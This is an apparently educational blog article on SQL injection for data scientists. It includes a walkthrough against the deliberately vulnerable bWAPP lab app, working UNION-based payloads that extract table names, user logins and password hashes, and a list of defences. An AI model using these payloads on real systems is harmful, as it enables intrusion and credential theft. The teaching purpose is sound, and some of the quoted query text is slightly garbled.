Being aware of Malicious Data Corruption as a Data Scientist (SQL Injection Attack)Abhinay DommalapatiBlockedUnblockFollowFollowingJun 14Graphic by CloudfareProblemEver since the advent of computers, there have always been people trying to hack them.
But this emergence of hacking received a boost when the age of information and data was born.
Information security became a rising concern as hackers maliciously found access to sensitive data.
Once a hacker finds access, he/she has almost complete power to do whatever he/she wishes to do with the data.
A hacker could not only steal information, but also supplant the integrity of the information by changing the data to provide misleading data.
Considering the level of competition we experience in the world today, it’s not surprising to find some businesses employing data hijacking methods to undermine the base operations of their competitors.
In this article, we will examine one of the most commonly attempted and still widely used malicious data corruption methods today, a SQL injection attack.
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
What is a SQL Injection Attack?Similar to its name, a SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution.
SQL injections are typically performed on faulty and poorly designed web applications that don’t account for the security vulnerabilities possibly present in the web application’s database management system.
A SQL injection attack is no more than a single line of code.
It’s a simple but powerful technique that can compromise essentially all of a web application’s data, including highly sensitive information like user logins and passwords, employee information, social security numbers, etc.
Scary stuff!In a 2012 study, it was observed that the average web application received 4 attack campaigns per month, and retailers received twice as many attacks as other industries.
Moreover, SQL injection (SQLI) was considered one of the top 10 web application vulnerabilities of 2007 and 2010 by the Open Web Application Security Project.
And in 2013, SQLI was rated the number one attack on the OWASP top ten.
There are four main sub-classes of SQL injection —Classic SQLIBlind or Inference SQL injectionDatabase management system-specific SQLICompounded SQLIFor the purposes of this article, we will look at an example of just a classic SQLI on a publicly vulnerable web application, bWAPP.
This web application was purposely built with many bugs, one of which is a search tool prone to a SQLI.
bWAPP is a PHP application that uses a MySQL database.
It can be hosted on Linux/Windows with Apache/IIS and MySQL.
It can also be installed with WAMP or XAMPP.
Another possibility is to download the bee-box, a custom Linux VM pre-installed with bWAPP.
You can download the web application here by installing the custom Linux virtual machine pre-installed with bWAPP.
The Bee Box gives you a variety of ways that you can hack and deface the website.
So if this is really interesting for you, feel free to explore!But I’m a data scientist!.Why do I care?As a data science professional, this issue may not seem like something that you should be concerned with.
One may think that this job is for the IT and cybersecurity and not the data team.
However, such a view is not only naive, but also ignorant.
Data scientists are seen as some of the most versatile technical professionals in the industry and should be equipped to combat a wide scope of problems the business is facing.
After all, how would a data scientist be able to do perform if the company’s data itself is deleted or corrupted?Running a SQL Injection AttackNow for the fun part!.Let’s perform a SQL injection on bWAPP to demonstrate how simple but powerful a SQL injection can be.
Note: This activity is purely for educational and demonstrative purposes only.
We strongly do not recommend you to perform a SQLI on an established web application as it is illegal.
After we fire up our Bee Box, we can click on the bWAPP — Start icon to launch the vulnerable web application.
After logging in (username: bee, password: bug), we can navigate to what kind of hack we wish to explore.
Choosing SQL Injection (get/search) will direct us to a page with a search bar for movies.
If we simply click on the Search button without entering anything in the search bar, we get a list of the movies in the database.
The SQL query for this search bar would look something like thisSELECT Title, Release, Character, Genre, IMDb FROM movies WHERE Title LIKE %’$_GET[‘title’]'Now, in order to infiltrate the database, we want to break the query by causing an error.
This will give us insight into if the web application is prone to a SQL injection.
This will be explained better in the example show below.
By entering in a ‘ character in the form which is used in the SQL query by the site, will cause an error as it ends the SQL query early causing an error (which is outputted out to the display).
So this is bad.
No web application should output a MySQL syntax error when an unexpected input is entered.
It should instead say something like “Movie not found” or something.
However, the problem is that when the PHP server that parses the input into the SQL database reads the ‘ character, it treats it as a control script instead of a character.
As a result, the query is now broken and is something that the SQL database can’t read and will spit out an error.
So the SQL query with the ‘ character now becomes —ELECT Title, Release, Character, Genre, IMDb FROM movies WHERE Title LIKE %’''Notice the dangling single quote at the end which is the root of the error.
But this is good from a hacker’s perspective.
We can now exploit this error to control the database by literally inputting our own malicious SQL queries.
After figuring out how many columns exist in the table (7 in this case), we type the following into the search bar we can get a list of all the tables in the database.
' union select 1, table_name, 3, 4, 5, 6, 7 from information_schema.
tables– -All this query does is perform a union command which pulls all the table names in the database and post them underneath the normal table list of movie names as we saw earlier.
These are just some of the tables we were able to pull from the database, but you’ll realize when you run this yourself how many more tables we are able to pull.
Fortunately, we were able to find the table that we are interested in, users.
We should be able to find some login information in this table, so let’s dive deeper.
Entering the following query will give us a table of information stored in the users table.
' union select 1, column_name, 3, 4, 5, 6, 7 from information_schema.
columns where table_name = "users"– -Notice how we specify the users table in this query.
And there we go!.Just a couple queries and we’ve found the usernames and passwords for website users!Moving on…' union select 1, login, 2, 3, 4, 5, 6, 7 from users– -And now for the passwords…' union select 1, password, 2, 3, 4, 5, 6, 7 from users– -So these are the hashed passwords for the login information.
Decrypting hashed values is actually a fairly simple task.
You could simply copy and paste the hash value into google and you’ll find decrypts that will do the task for you.
ConclusionSo you saw how easy that was.
Just a couple lines of code and you have the entire database of the web application literally at your fingertips.
Although sanitation methods have countered many of the SQL injection attacks we face today, web applications developed by individuals are inexperienced in cybersecurity or unaware of SQL injections are highly vulnerable to a data compromise.
A SQL injection would obviously not work in a Google search bar due to the many sanitation methods that Google would employ.
Some of the sanitation methods that could be employed to avoid SQL injection attacks include but are not limited to —Parametrized statements —bounding user input to a parameter instead of embedding user input in the statementEscaping — creating a comprehensive blacklist of characters that need translationPattern Check — requiring strings to follow some sort of strict pattern (date, UUID, alphanumeric only, etc.
)Database Permissions — limiting the permissions on the database login used by the web application to only what is neededAlthough it may not be the data scientist’s job to implement some of these safeguards, it’s important for the data scientist to at least be aware of SQL injection especially if the data scientist is working a small firm or startup in which the web applications may not be fully secure.
Furthermore, data scientists should be aware that the data they query from SQL had to have originate from some place.
Some database manager or administrator put that data together in a relational database and if he didn’t account for SQL injections, the data scientist bears the burden of reporting misleading insights from tampered information.
.. More details